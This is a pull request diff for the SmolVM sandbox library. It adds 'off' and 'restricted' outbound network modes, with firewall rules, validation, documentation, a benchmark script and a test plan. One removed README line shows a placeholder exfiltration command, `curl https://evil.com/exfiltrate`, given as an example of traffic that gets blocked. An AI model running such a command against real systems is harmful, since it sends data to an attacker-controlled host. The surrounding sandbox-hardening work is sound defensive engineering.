### PR TITLE
feat: enforce minimal sandbox network policies

### DIFF
--- a/.github/workflows/e2e.yml
+++ b/.github/workflows/e2e.yml
@@ -131,7 +131,7 @@ jobs:
       - name: Install bridge test tooling
         run: |
           sudo apt-get update -qq
-          sudo apt-get install -y --no-install-recommends iproute2 iputils-ping
+          sudo apt-get install -y --no-install-recommends iproute2 iputils-ping nftables
 
       - name: Enable KVM and optional vsock
         run: |

--- a/.github/workflows/e2e.yml
+++ b/.github/workflows/e2e.yml
@@ -128,10 +128,10 @@ jobs:
             --configure-runtime \
             --runtime-user "$USER"
 
-      - name: Install bridge test tooling
+      - name: Install network test tooling
         run: |
           sudo apt-get update -qq
-          sudo apt-get install -y --no-install-recommends iproute2 iputils-ping nftables
+          sudo apt-get install -y --no-install-recommends iproute2 iputils-ping nftables iptables
 
       - name: Enable KVM and optional vsock
         run: |

--- a/README.md
+++ b/README.md
@@ -39,7 +39,7 @@ Each microVM boots in milliseconds, runs any code or software you throw at it, p
 <tr>
 <td width="50%" valign="top">
 <p><img src="https://api.iconify.design/lucide/network.svg?color=%236e7681" width="24" height="24" align="absmiddle" alt=""> <strong>Network controls</strong></p>
-<p>Lock down egress to specific domains so agents can't call home or exfiltrate data.</p>
+<p>Turn outbound access off or limit it to specific IP addresses on Linux Firecracker.</p>
 <p><a href="#network-controls">Read more →</a></p>
 </td>
 <td width="50%" valign="top">
@@ -287,22 +287,24 @@ See [examples/browser_sandbox.py](examples/browser_sandbox.py) for a complete Py
 
 ## Network controls
 
-By default, sandboxes have full internet access. You can restrict which domains a sandbox can reach by passing `internet_settings`:
+Sandboxes have internet access by default. On Linux with Firecracker, turn outbound access off while keeping commands and file transfers available through a direct connection (`vsock`):
 
 ```python
 from smolvm import SmolVM
 
-vm = SmolVM(
-    internet_settings={
-        "allowed_domains": ["https://api.openai.com"],
-    }
-)
-
-vm.run("curl https://api.openai.com/v1/models")  # allowed
-vm.run("curl https://evil.com/exfiltrate")  # blocked
+with SmolVM(
+    backend="firecracker",
+    comm_channel="vsock",
+    internet_settings={"mode": "off"},
+) as vm:
+    print(vm.run("echo hello").stdout)
 ```
 
-See [docs/guides/networking.md](docs/guides/networking.md) for how it works under the hood.
+Use `mode="restricted"` with `allowed_cidrs` to allow specific IPv4 addresses or ranges. These modes require private networking and do not support shared folders or exposed ports. Command output and explicit file downloads still work when outbound access is off.
+
+Existing `allowed_domains` lists allow the IP addresses found during setup; they do not verify the hostname on each connection. DNS servers are not automatically allowed.
+
+See the [networking guide](docs/guides/networking.md) for a restricted-access example and supported configurations.
 
 
 ## Mount host directories

--- a/docs/deep-dive/network-policy-implementation-plan.md
+++ b/docs/deep-dive/network-policy-implementation-plan.md
@@ -9,7 +9,7 @@ Implementation decisions:
 - Explicit off/restricted modes are Firecracker-only; QEMU TAP keeps legacy domain support.
 - Each managed NAT interface gets an owned nftables table with early forward/input checks. Replacement is one transaction, including removal of blanket forwarding permission. This avoids shared rule-handle discovery and makes stale connection state unable to bypass explicit policies.
 - Open mode keeps existing private-network access, with earlier sandbox and IPv4 link-local isolation. No proxy or guest-image change was added.
-- The SDK, lifecycle checks, controlled Linux test suite, CI dependency, and benchmark script are implemented. The full macOS regression suite passes (2,167 passed, 21 skipped, 33 deselected). The controlled Linux namespace packet test passes against both source and the installed wheel, including IPv6 positive/negative controls. No Firecracker lifecycle or latency result is claimed.
+- The SDK, lifecycle checks, controlled Linux test suite, CI dependency, and benchmark script are implemented. The full macOS regression suite passes (2,183 passed, 21 skipped, 33 deselected). The controlled Linux namespace packet test passes against both source and the installed wheel, including IPv6 positive/negative controls. No Firecracker lifecycle or latency result is claimed.
 
 Run `python scripts/benchmark-network-policy.py --help` for the measurement entry point. Use the same script and controlled endpoint against baseline and candidate checkouts on a disposable Linux runner.
 
@@ -37,7 +37,7 @@ SmolVM(
 )
 ```
 
-Add `mode: Literal["open", "off", "restricted"] | None = None` and `allowed_cidrs: list[str] = []`. Missing mode preserves the old interpretation of `allowed_domains`; it is a compatibility case, not a fourth advertised mode.
+Add `mode: Literal["open", "off", "restricted"] | None = None` and `allowed_cidrs: tuple[str, ...] = ()` (list inputs remain accepted; JSON uses arrays). Missing mode preserves the old interpretation of `allowed_domains`; it is a compatibility case, not a fourth advertised mode.
 
 Validation rules:
 
@@ -49,7 +49,7 @@ Validation rules:
 - Preserve legacy domain settings on supported NAT backends, with their existing setup-time IPv4 resolution semantics. Document that they allow addresses, not verified hostnames. Do not route them through a new proxy.
 - A requested restriction on an unsupported backend is an error, replacing the current warning-and-continue behavior.
 
-Use one small normalization helper to produce the effective mode and destination list. No generic policy compiler or plugin interface. Ensure validation runs after facade configuration merging: `model_copy(update=...)` currently bypasses model validation.
+Use shared policy parsing and compatibility validation at the public constructor before image preparation and again at the execution boundary. Unknown keys are rejected. Public SDK policy errors use `smolvm.ValidationError`; direct Pydantic model construction retains Pydantic errors. Policy collections are immutable tuples so caller mutation cannot change stored state. `model_copy(update=...)` bypasses model validation, so execution-boundary revalidation remains required.
 
 Keep the existing serialized VM configuration as the persistence mechanism. Test loading old configurations without the new fields. Existing objects carrying unenforced method restrictions must produce an actionable validation error rather than silently gaining enforcement claims.
 

--- a/docs/deep-dive/network-policy-implementation-plan.md
+++ b/docs/deep-dive/network-policy-implementation-plan.md
@@ -1,0 +1,172 @@
+# Minimal network policy implementation plan
+
+SmolVM should start quickly and do exactly what its network settings promise. The first release will let callers turn outbound access off or limit it to specific IP addresses, while keeping commands and file operations usable.
+
+Status: first-release implementation is complete. The controlled Linux packet test passes; Firecracker lifecycle tests and startup measurements remain release gates. This is not a published release.
+
+Implementation decisions:
+
+- Explicit off/restricted modes are Firecracker-only; QEMU TAP keeps legacy domain support.
+- Each managed NAT interface gets an owned nftables table with early forward/input checks. Replacement is one transaction, including removal of blanket forwarding permission. This avoids shared rule-handle discovery and makes stale connection state unable to bypass explicit policies.
+- Open mode keeps existing private-network access, with earlier sandbox and IPv4 link-local isolation. No proxy or guest-image change was added.
+- The SDK, lifecycle checks, controlled Linux test suite, CI dependency, and benchmark script are implemented. The full macOS regression suite passes (2,167 passed, 21 skipped, 33 deselected). The controlled Linux namespace packet test passes against both source and the installed wheel, including IPv6 positive/negative controls. No Firecracker lifecycle or latency result is claimed.
+
+Run `python scripts/benchmark-network-policy.py --help` for the measurement entry point. Use the same script and controlled endpoint against baseline and candidate checkouts on a disposable Linux runner.
+
+## Shipping decision
+
+Ship one small release on Linux with Firecracker NAT networking. Include Linux QEMU TAP only if the same implementation passes the live tests; otherwise reject the new restricted modes there until it does. Keep unrestricted networking as the default.
+
+The release contains three modes, early validation, reliable firewall installation, persistence across restart/restore, and live packet tests. It does not contain a proxy, live policy updates, a policy service, or a new database table.
+
+The public contract is outbound access. `off` prevents guest-initiated IP connections; it does not disable the trusted command/file control channel or claim to prevent data leaving through command output and file downloads.
+
+## 1. API and compatibility
+
+Extend the existing `InternetSettings` in `src/smolvm/types.py` rather than introducing a second policy object or top-level constructor argument:
+
+```python
+SmolVM(internet_settings={"mode": "open"})
+SmolVM(comm_channel="vsock", internet_settings={"mode": "off"})
+SmolVM(
+    comm_channel="vsock",
+    internet_settings={
+        "mode": "restricted",
+        "allowed_cidrs": ["203.0.113.10/32"],  # Illustrative destination.
+    },
+)
+```
+
+Add `mode: Literal["open", "off", "restricted"] | None = None` and `allowed_cidrs: list[str] = []`. Missing mode preserves the old interpretation of `allowed_domains`; it is a compatibility case, not a fourth advertised mode.
+
+Validation rules:
+
+- No settings, or legacy `allowed_domains=["*"]`, means open.
+- Explicit `restricted` requires at least one IPv4 address/range; normalize bare addresses to `/32` using `ipaddress`, and reject malformed ranges or IPv6.
+- Explicit `open` and `off` reject nonempty CIDR lists. CIDRs without explicit `restricted` are an error.
+- Explicit modes reject non-default domain settings. Do not combine two different destination semantics in v1.
+- Non-default HTTP-method settings fail with an actionable error because they are not enforced.
+- Preserve legacy domain settings on supported NAT backends, with their existing setup-time IPv4 resolution semantics. Document that they allow addresses, not verified hostnames. Do not route them through a new proxy.
+- A requested restriction on an unsupported backend is an error, replacing the current warning-and-continue behavior.
+
+Use one small normalization helper to produce the effective mode and destination list. No generic policy compiler or plugin interface. Ensure validation runs after facade configuration merging: `model_copy(update=...)` currently bypasses model validation.
+
+Keep the existing serialized VM configuration as the persistence mechanism. Test loading old configurations without the new fields. Existing objects carrying unenforced method restrictions must produce an actionable validation error rather than silently gaining enforcement claims.
+
+### Control-channel scope cut
+
+Require a resolved vsock control channel for the new `off` and `restricted` modes in v1. Vsock is the existing direct VM control connection, independent of guest IP networking. Default channel selection can resolve to it; an explicit incompatible request must fail rather than silently change transport.
+
+Reject workspace mounts, port forwards, and later port-exposure operations for these modes in v1. Some existing operations repair networking or require SSH; supporting their exceptions now would enlarge the policy contract. Commands and file transfer must pass over the existing guest agent. If either cannot, fix that narrow path or withhold the mode; do not open networking as a fallback.
+
+Bridge, QEMU user-mode networking, libkrun, Windows guests, and macOS guests do not support the new restrictions. Unrestricted use remains available as before.
+
+## 2. Firewall behavior
+
+Modify `src/smolvm/host/network.py`; retain nftables and existing TAP ownership. Scope every new rule to SmolVM-managed interfaces so unrelated host traffic is unaffected.
+
+| Mode | Guest-initiated traffic | DNS | IPv6 |
+| --- | --- | --- | --- |
+| Open | Existing internet behavior, with verified sandbox/metadata isolation | Existing behavior | Preserve existing behavior |
+| Off | Deny all IP destinations, including the host | Denied | Denied |
+| Restricted | Allow configured IPv4 destinations; deny all others | Resolver must be explicitly allowed | Denied |
+
+Restricted v1 permits all ports/protocols at an allowed address. It is an IP policy, not an HTTP policy. There is no automatic DNS exception. Callers can use literal addresses, preconfigured names, or explicitly allow a resolver. Document the latter's broader permission; do not add port-specific rules in this release.
+
+Implementation requirements:
+
+1. Put mandatory isolation decisions ahead of generic accepts, established-connection accepts, and port-forward accepts. Inspect the actual complete chain ordering, not only the generated per-policy fragment.
+2. Cover both forwarded packets and packets addressed to the Linux host. Use an input hook for the latter; the existing forward hook is insufficient.
+3. Block traffic between managed sandboxes and to metadata destinations, including `169.254.169.254`, before destination allowances. Reject overlapping restricted ranges that would imply an exception to these mandatory blocks. Inventory any additional metadata routes actually supported by the deployment; do not claim a universal list.
+4. Private remote services can be explicitly allowed in restricted mode. Do not block all private address space in open mode as part of this release; that is a separate compatibility decision.
+5. Apply restricted/off rules and remove the TAP's blanket permission in one nft transaction. Failure must leave the old policy intact and propagate an error.
+6. Change NAT setup so callers can install address translation without first granting blanket egress. No temporary open window during create, repair, or restore.
+7. Share rule generation between sync and async paths. Keep execution wrappers separate and small.
+8. Remove only the sandbox's owned policy resources during cleanup. Before an interface name is reused, ensure stale rules and connection-tracking state cannot grant old permissions. Scope any connection-state cleanup narrowly; never flush the host's global table.
+
+The existing global established-connection accept and separately removed `allowed_taps` membership are specific review points. The current unit tests do not prove full-chain precedence or transaction safety.
+
+## 3. Lifecycle integration
+
+Update these paths in `src/smolvm/vm.py` together:
+
+- Synchronous and asynchronous creation.
+- `ensure_network_connectivity`, which currently calls NAT setup again.
+- `_ensure_firecracker_network_for_restore` and any backend-specific restore path.
+- Normal start/restart and cleanup.
+
+Order: resolve backend/control channel → validate effective settings → prepare network resources → install complete policy → start/resume guest execution.
+
+Policy-install failure must prevent guest execution. Clean resources created by the failed attempt, preserve resources owned by other VMs, and report the failure. A repair operation must never temporarily widen policy.
+
+Persist and reapply the same effective policy on restart and restore. Do not offer changing policy on a running or stopped existing sandbox in v1; create a new sandbox to change it. Reconnection reads stored settings and cannot override them. Legacy domain settings retain their documented re-resolution behavior.
+
+Do not retrofit new semantics into already-running sandboxes. Document that corrected baseline rules take effect when networking is reconciled or the sandbox is restarted. If shared-chain changes affect existing guests immediately, identify that explicitly during implementation and release validation.
+
+## 4. Tests that gate shipping
+
+### Fast tests
+
+Extend `tests/runtime/test_internet_settings.py`, `tests/runtime/test_network.py`, `tests/vm/test_vm.py`, and facade tests with behavior-focused coverage:
+
+- Mode validation, IPv4 normalization, contradictory settings, legacy loading, and unsupported-backend errors.
+- Rejection after facade configuration merging, including dict and `VMConfig` entry points.
+- One transaction includes blanket-permission removal and new rules.
+- Complete chain precedence, input filtering, IPv6 denial, and sync/async agreement.
+- Policy application precedes execution; failure prevents execution in create and restore.
+- Repair, reconnect, and later operations cannot reopen networking.
+
+### Live Linux tests
+
+Add `tests/e2e/test_network_policy.py`, following the existing privileged network-lab pattern in `tests/e2e/test_bridge_networking.py`. Reuse the current image/runtime fixtures. Leave the existing untracked `tests/integration/network_policy/_assets/` files untouched.
+
+Use isolated network namespaces and controlled HTTP/TCP/UDP responders. Avoid public services, real metadata endpoints, and external DNS as correctness dependencies. Use unique resource names and `finally` cleanup.
+
+Required scenarios:
+
+| Scenario | Passing result |
+| --- | --- |
+| Open | Controlled external endpoint works; neighboring sandbox and simulated metadata are denied |
+| Off | TCP, UDP, DNS, IPv6, and host-service probes produce no successful application response or delivered payload |
+| Restricted | Allowed endpoint responds; denied endpoint does not; explicit resolver behavior matches the contract |
+| Control | Execute a command and upload/download a file under off and restricted |
+| Lifecycle | Restart and snapshot restore retain policy before guest workload resumes |
+| Failure | Inject firewall installation failure; guest workload never executes |
+| Reuse | Delete/recreate with a different policy; previous flow/rules cannot grant access |
+| Regression | Existing open-mode SSH, file transfer, mounts, and exposure still work |
+
+Use both guest results and destination-side received-payload evidence. Probe with an attempted guest-side network reconfiguration as well, so policy is demonstrably outside guest control. Tests run only on disposable privileged Linux runners, not the developer's everyday network.
+
+Add the required Firecracker job to the existing e2e workflow. QEMU TAP is advertised only after the same applicable matrix passes. A skipped privileged suite is not release evidence.
+
+## 5. Performance and release gate
+
+Before edits, record current creation-to-first-command, restore-to-first-command, and first successful network request on a fixed Linux runner and cached image. Separate image-download time from policy overhead.
+
+Repeat after changes for open/off/restricted with one destination and a modest list (for example 32 entries), both serially and with eight concurrent starts. Use a small repeatable script and save raw timings; no benchmark framework.
+
+Use 100 warm-image samples per serial mode for median and p95, and report concurrency results separately. Proposed initial gate: no repeatable open-mode p95 regression greater than 5% or 20 ms, whichever is larger. Validate runner noise with repeated baseline runs before treating this as a hard budget. Off/restricted should not perform DNS lookups, start helper processes, or make remote control-plane calls.
+
+Ship when required live tests pass, performance stays within the agreed budget, and examples work from the installed package. Run the repository's normal required checks plus focused tests; do not alter unrelated code to satisfy optional scope.
+
+No guest-image change is planned. If implementation requires one, follow the existing image build/smoke and release-pin checklist before tagging the package.
+
+## 6. Delivery sequence
+
+1. **PR 1 — contract and regression harness:** add the new settings, compatibility validation, and controlled test fixtures. Keep new modes explicitly unavailable until enforcement lands; never merge an accepted but unenforced mode.
+2. **PR 2 — enforcement and lifecycle:** implement firewall changes and create/repair/restore/cleanup integration. Enable only supported, tested combinations. Land live tests alongside implementation.
+3. **PR 3 — release preparation:** update networking documentation and constructor descriptions, record benchmarks, wire required CI, and smoke the installed package. Ship the release here.
+
+If PR 1 is too small to justify a separate merge, combine it with PR 2. These are review boundaries, not an architecture requiring independently deployed components.
+
+SDK-only configuration is sufficient for this release because the existing restrictions already enter through the SDK. Do not overload the CLI's existing `--network` attachment flag. A later CLI addition must preserve the project's noun-verb structure and use distinct outbound-policy options.
+
+## Deferred follow-up: useful domain restrictions
+
+Do not implement this until the first release ships. Validate demand using package installation, repository cloning, and model API calls. Then time-box a spike with an existing shared HTTP/HTTPS proxy: trusted per-sandbox policy identity, firewall-enforced bypass prevention, destination resolution checks, exact/wildcard domains, and blocked-destination diagnostics.
+
+The spike must prove clients work, failures are understandable, and unrestricted startup is unaffected. It must define behavior for raw TCP, QUIC, shared hosting, and unavailable hostname information. Do not silently fall back to unrestricted access.
+
+Defer live updates, HTTP-method restrictions, TLS decryption, secret injection, content inspection, dashboards, named policy resources, and per-sandbox proxy processes. No automatic package-registry exceptions or promise that allowing a service prevents uploading data to it.
+
+The stopping point is a small, tested contract: **off means off, restricted IP access works, and normal sandbox startup remains fast.**

--- a/docs/guides/networking.md
+++ b/docs/guides/networking.md
@@ -62,14 +62,23 @@ The default mode is `open`, which enables internet access. Managed private netwo
 
 Use `restricted` with the IPv4 addresses or network ranges your task needs:
 
+Replace `203.0.113.10` below with your service's actual address:
+
 ```python
-settings = {
-    "mode": "restricted",
-    "allowed_cidrs": ["203.0.113.10/32"],
-}
+from smolvm import SmolVM
+
+with SmolVM(
+    backend="firecracker",
+    comm_channel="vsock",
+    internet_settings={
+        "mode": "restricted",
+        "allowed_cidrs": ["203.0.113.10/32"],
+    },
+) as vm:
+    print(vm.run("echo hello").stdout)
 ```
 
-Replace the example address with your service's actual address. `/32` means one address; a range such as `10.20.0.0/24` includes multiple addresses. Bare IPv4 addresses are also accepted. Pass `settings` as `internet_settings` when creating the sandbox, as in the previous example.
+`/32` means one address; a range such as `10.20.0.0/24` includes multiple addresses. Bare IPv4 addresses are also accepted.
 
 Only the listed destinations are reachable, on any port or protocol. IPv6 and connections to your machine are blocked. Sandbox and link-local address ranges cannot be allowed. There is no automatic DNS exception: use an IP address directly or explicitly include the resolver's address. Allowing a resolver permits other traffic to that same address too.
 

--- a/docs/guides/networking.md
+++ b/docs/guides/networking.md
@@ -98,3 +98,31 @@ SmolVM resolves the names to IPv4 addresses during setup and allows traffic to t
 Use `"*"` to allow all destinations. Entries may be hostnames or URLs without a path; SmolVM stores their hostnames. Do not combine domain lists with the new modes. HTTP-method restrictions are unsupported and rejected.
 
 Legacy domain lists require Firecracker private networking or QEMU with `VMConfig.qemu_network="tap"`. Other networking configurations reject restrictions instead of continuing without enforcement. These lists are a compatibility feature, not strict domain filtering.
+
+## Validate settings and handle errors
+
+Use the exported settings class for editor suggestions. Lists are accepted as input; stored collections are immutable tuples. Saved JSON still uses arrays, including when loading older settings. Create a new sandbox to change its policy.
+
+```python
+from smolvm import InternetSettings
+
+policy = InternetSettings(mode="restricted", allowed_cidrs=["203.0.113.10"])
+```
+
+Unknown fields are errors: misspelling `mode` cannot silently enable internet access, and unsupported options such as `allowed_ports` are rejected. Invalid settings fail before image preparation.
+
+Public SDK operations raise `smolvm.ValidationError` for invalid or unsupported policy settings. It is also a `SmolVMError`. For invalid fields, `details["errors"]` contains the field locations, messages, and input values:
+
+```python
+from smolvm import SmolVM, ValidationError
+
+try:
+    SmolVM(internet_settings={"mode": "restricted"})
+except ValidationError as error:
+    print(error)  # restricted requires allowed_cidrs
+    print(error.details.get("errors", []))
+```
+
+Constructing `InternetSettings(...)` or `VMConfig(...)` directly uses Pydantic's `ValidationError`. This is separate from the SDK operation error above.
+
+Python reconnect and snapshot restore must share an inventory. See the [Python snapshot example](snapshots.md#save-and-restore-from-python); setting the same `data_dir` alone does not share inventory.

--- a/docs/guides/networking.md
+++ b/docs/guides/networking.md
@@ -1,6 +1,6 @@
 # Networking
 
-SmolVM can make a service inside a sandbox available on your machine and, on supported sandboxes, limit which internet domains it can reach.
+SmolVM can share a sandbox service with your machine and control which network destinations a sandbox can reach.
 
 ## Share a sandbox service
 
@@ -39,21 +39,53 @@ Bridge mode deliberately does not provide SmolVM NAT, port exposure, SSH from th
 
 A bridged sandbox can send traffic directly to the selected network. Configuration mistakes or untrusted guest software can affect other devices through duplicate addresses, address spoofing, or unwanted services. Use this mode only on a network where that access is acceptable.
 
-## Limit outbound domains in Python
+## Turn outbound access off
 
-Pass an allow-list when creating a sandbox:
+On Linux Firecracker sandboxes, turn outbound networking off while keeping commands and file transfers available:
 
 ```python
 from smolvm import SmolVM
 
+with SmolVM(
+    backend="firecracker",
+    comm_channel="vsock",
+    internet_settings={"mode": "off"},
+) as vm:
+    print(vm.run("echo hello").stdout)
+```
+
+The `vsock` setting uses a direct connection to the sandbox for commands and files. It does not need internet access. Networking off blocks guest-initiated IP traffic, including DNS and connections to your machine. Command output and explicit file downloads can still leave the sandbox through this direct connection.
+
+The default mode is `open`, which enables internet access. Managed private networking blocks connections between sandboxes and to IPv4 link-local addresses, including the common cloud metadata address `169.254.169.254`. It does not block every private network or every cloud provider's metadata service.
+
+## Allow specific IP addresses
+
+Use `restricted` with the IPv4 addresses or network ranges your task needs:
+
+```python
+settings = {
+    "mode": "restricted",
+    "allowed_cidrs": ["203.0.113.10/32"],
+}
+```
+
+Replace the example address with your service's actual address. `/32` means one address; a range such as `10.20.0.0/24` includes multiple addresses. Bare IPv4 addresses are also accepted. Pass `settings` as `internet_settings` when creating the sandbox, as in the previous example.
+
+Only the listed destinations are reachable, on any port or protocol. IPv6 and connections to your machine are blocked. Sandbox and link-local address ranges cannot be allowed. There is no automatic DNS exception: use an IP address directly or explicitly include the resolver's address. Allowing a resolver permits other traffic to that same address too.
+
+These modes currently require Linux Firecracker with private networking and the direct `vsock` control connection. Shared folders and exposed ports are not supported with `off` or `restricted`. Unsupported combinations fail before the sandbox starts. Policy survives restart and snapshot restore; create a new sandbox to change it.
+
+## Legacy domain lists
+
+Existing callers can continue to use domain lists on supported private networking:
+
+```python
 with SmolVM(internet_settings={"allowed_domains": ["api.example.com"]}) as vm:
     vm.run("curl https://api.example.com")
 ```
 
-Use `"*"` to allow all domains, which is the default. Entries may be hostnames or URLs without a path; SmolVM stores their hostnames. HTTP method restrictions are reserved for future work and are not enforced.
+SmolVM resolves the names to IPv4 addresses during setup and allows traffic to those addresses on any port. It does not verify the hostname on each connection. Shared hosting may permit other services at the same address, and changing DNS answers may prevent an allowed service from working. DNS servers are not automatically allowed.
 
-## Current limits
+Use `"*"` to allow all destinations. Entries may be hostnames or URLs without a path; SmolVM stores their hostnames. Do not combine domain lists with the new modes. HTTP-method restrictions are unsupported and rejected.
 
-Outbound-domain controls require SmolVM's private TAP networking: Firecracker uses it by default, and custom QEMU configurations can opt in with `VMConfig.qemu_network="tap"`. They do not apply to bridged networking, QEMU user-mode networking, libkrun, or Windows guests. Treat an allow-list as a network control, not as a complete security boundary for untrusted code.
-
-**Implementation notes:** the public settings and validation are in [`src/smolvm/types.py`](../../src/smolvm/types.py), backend networking selection is in [`src/smolvm/vm.py`](../../src/smolvm/vm.py), and host rules are applied in [`src/smolvm/host/network.py`](../../src/smolvm/host/network.py). Behavior is covered by [`tests/test_internet_settings.py`](../../tests/test_internet_settings.py) and [`tests/test_network.py`](../../tests/test_network.py).
+Legacy domain lists require Firecracker private networking or QEMU with `VMConfig.qemu_network="tap"`. Other networking configurations reject restrictions instead of continuing without enforcement. These lists are a compatibility feature, not strict domain filtering.

--- a/docs/guides/snapshots.md
+++ b/docs/guides/snapshots.md
@@ -41,3 +41,39 @@ smolvm sandbox snapshot create demo --snapshot-type disk --resume-source --live-
 Snapshots do not support Windows guests, workspace mounts, extra drives, shared disks, or raw QEMU disks. Snapshot creation can pause a sandbox unless you use the live-only command above.
 
 **Implementation notes:** snapshot types and their meanings are defined in [`src/smolvm/types.py`](../../src/smolvm/types.py); support checks and restore behavior are in [`src/smolvm/vm.py`](../../src/smolvm/vm.py); the facade flushes a guest before a disk snapshot in [`src/smolvm/facade.py`](../../src/smolvm/facade.py). See [`tests/test_snapshot.py`](../../tests/test_snapshot.py) and [`tests/test_snapshot_qemu.py`](../../tests/test_snapshot_qemu.py).
+
+## Save and restore from Python
+
+Give creation and restore the same inventory so both can find the snapshot. The default SDK inventory lives in memory: `data_dir` controls where files are stored, but does not reconnect snapshot records between SDK objects or processes.
+
+This Linux Firecracker example saves and restores a sandbox with outbound access off. Commands still work through the direct connection:
+
+```python
+from pathlib import Path
+from tempfile import TemporaryDirectory
+
+from smolvm import SmolVM
+from smolvm.storage import MemoryStateManager
+
+with TemporaryDirectory() as directory:
+    workdir = Path(directory)
+    inventory = MemoryStateManager(workdir)
+    with SmolVM(
+        backend="firecracker",
+        comm_channel="vsock",
+        internet_settings={"mode": "off"},
+        data_dir=workdir,
+        state_manager=inventory,
+    ) as vm:
+        snapshot = vm.snapshot(snapshot_type="disk")
+
+    with SmolVM.from_snapshot(
+        snapshot.snapshot_id,
+        backend="firecracker",
+        data_dir=workdir,
+        state_manager=inventory,
+    ) as restored:
+        print(restored.run("echo restored").stdout)
+```
+
+Restore inherits the saved network policy. Reconnecting by `vm_id` also requires the original inventory and cannot change the policy. Use the CLI's persistent inventory for workflows that must continue across processes.

--- a/scripts/benchmark-network-policy.py
+++ b/scripts/benchmark-network-policy.py
@@ -1,0 +1,86 @@
+#!/usr/bin/env python3
+"""Measure cached-image policy startup; run on a disposable Linux Firecracker host.
+
+Run this same script against the baseline checkout with --mode open, then the
+candidate checkout. Keep runner, image, URL, and concurrency identical.
+"""
+
+from __future__ import annotations
+
+import argparse
+import json
+import time
+from concurrent.futures import ThreadPoolExecutor
+from pathlib import Path
+from urllib.parse import urlparse
+
+from smolvm import SmolVM
+from smolvm.types import SnapshotType
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser(description=__doc__)
+    parser.add_argument("--mode", choices=["open", "off", "restricted"], default="open")
+    parser.add_argument("--allow", action="append", default=[], help="Allowed IPv4 address/range")
+    parser.add_argument("--url", help="Controlled HTTP endpoint for first-request timing")
+    parser.add_argument("--samples", type=int, default=100)
+    parser.add_argument("--concurrency", type=int, default=1)
+    parser.add_argument("--restore", action="store_true", help="Also measure disk snapshot restore")
+    parser.add_argument("--output", type=Path, required=True)
+    args = parser.parse_args()
+    if args.samples < 1 or args.concurrency < 1:
+        parser.error("samples and concurrency must be positive")
+    if args.mode == "restricted" and not args.allow:
+        parser.error("restricted requires --allow")
+    if args.url and urlparse(args.url).scheme not in {"http", "https"}:
+        parser.error("url must use http or https")
+    import shlex
+
+    def sample(index: int) -> dict:
+        kwargs = {"backend": "firecracker", "os": "alpine", "comm_channel": "vsock"}
+        # Omission lets this script run unchanged against the baseline version.
+        if args.mode != "open":
+            kwargs["internet_settings"] = {"mode": args.mode, "allowed_cidrs": args.allow}
+        started = time.monotonic()
+        sandbox = SmolVM(**kwargs)
+        target = sandbox
+        snapshot_id = None
+        try:
+            sandbox.start()
+            assert sandbox.run("true").exit_code == 0
+            result = {"sample": index, "first_command_ms": (time.monotonic() - started) * 1000}
+            if args.url and args.mode != "off":
+                assert (
+                    sandbox.run(f"wget -T 5 -qO /dev/null {shlex.quote(args.url)}").exit_code == 0
+                )
+                result["first_request_ms"] = (time.monotonic() - started) * 1000
+            if args.restore:
+                snap = sandbox.snapshot(snapshot_type=SnapshotType.DISK)
+                snapshot_id = snap.snapshot_id
+                sandbox.stop()
+                sandbox.delete()
+                started = time.monotonic()
+                target = SmolVM.from_snapshot(
+                    snap.snapshot_id, backend="firecracker", resume_vm=True
+                )
+                assert target.run("true").exit_code == 0
+                result["restore_first_command_ms"] = (time.monotonic() - started) * 1000
+            return result
+        finally:
+            try:
+                target.delete()
+            finally:
+                if snapshot_id is not None:
+                    target._sdk.delete_snapshot(snapshot_id)
+
+    # Explicit unrecorded warmup separates image download/build from startup.
+    sample(-1)
+    with args.output.open("w") as output, ThreadPoolExecutor(args.concurrency) as pool:
+        output.write(json.dumps({"configuration": vars(args)}, default=str) + "\n")
+        for result in pool.map(sample, range(args.samples)):
+            output.write(json.dumps(result) + "\n")
+            output.flush()
+
+
+if __name__ == "__main__":
+    main()

--- a/src/smolvm/_network_policy.py
+++ b/src/smolvm/_network_policy.py
@@ -1,0 +1,66 @@
+"""Validation shared by public constructors and the execution boundary."""
+
+import sys
+from typing import Any
+
+from pydantic import ValidationError as PydanticValidationError
+
+from smolvm.exceptions import ValidationError
+from smolvm.types import InternetSettings
+
+
+def parse_network_policy(value: InternetSettings | dict[str, Any]) -> InternetSettings:
+    try:
+        # model_copy/model_construct can bypass even frozen model validation.
+        return InternetSettings.model_validate(
+            value.model_dump() if isinstance(value, InternetSettings) else value
+        )
+    except PydanticValidationError as exc:
+        errors = exc.errors(include_url=False, include_context=False)
+        first = errors[0]
+        field = ".".join(str(part) for part in first["loc"])
+        message = first["msg"].removeprefix("Value error, ")
+        raise ValidationError(
+            f"Invalid internet_settings{'.' + field if field else ''}: {message}",
+            {"field": "internet_settings", "errors": errors},
+        ) from exc
+
+
+def validate_network_policy_options(
+    settings: InternetSettings,
+    *,
+    backend: str,
+    guest_os: str,
+    comm_channel: str | None = None,
+    has_mounts: bool = False,
+    has_forwards: bool = False,
+    network_mode: str = "nat",
+    qemu_network: str = "slirp",
+) -> None:
+    if settings.is_allow_all_domains:
+        return
+    recovery = (
+        "Use a Linux guest on Linux with backend='firecracker', comm_channel='vsock', "
+        "and default private networking."
+    )
+    if guest_os in {"windows", "macos"}:
+        raise ValidationError(f"This guest does not support network restrictions. {recovery}")
+    if network_mode != "nat":
+        raise ValidationError(
+            "Network restrictions require private networking; "
+            "set network_attachment={'mode': 'nat'} on VMConfig."
+        )
+    if settings.has_explicit_restrictions:
+        if backend != "firecracker" or sys.platform != "linux":
+            raise ValidationError(f"This network mode requires Linux Firecracker. {recovery}")
+        if has_mounts or has_forwards:
+            raise ValidationError(
+                "This network mode cannot use shared folders or exposed ports; "
+                "omit mounts and port_forwards (workspace_mounts on VMConfig)."
+            )
+        if comm_channel == "ssh":
+            raise ValidationError(
+                "This network mode requires a direct command connection; set comm_channel='vsock'."
+            )
+    elif backend != "firecracker" and not (backend == "qemu" and qemu_network == "tap"):
+        raise ValidationError(f"This configuration cannot enforce network restrictions. {recovery}")

--- a/src/smolvm/_network_policy.py
+++ b/src/smolvm/_network_policy.py
@@ -13,7 +13,7 @@ def parse_network_policy(value: InternetSettings | dict[str, Any]) -> InternetSe
     try:
         # model_copy/model_construct can bypass even frozen model validation.
         return InternetSettings.model_validate(
-            value.model_dump() if isinstance(value, InternetSettings) else value
+            value.model_dump(warnings=False) if isinstance(value, InternetSettings) else value
         )
     except PydanticValidationError as exc:
         errors = exc.errors(include_url=False, include_context=False)

--- a/src/smolvm/facade.py
+++ b/src/smolvm/facade.py
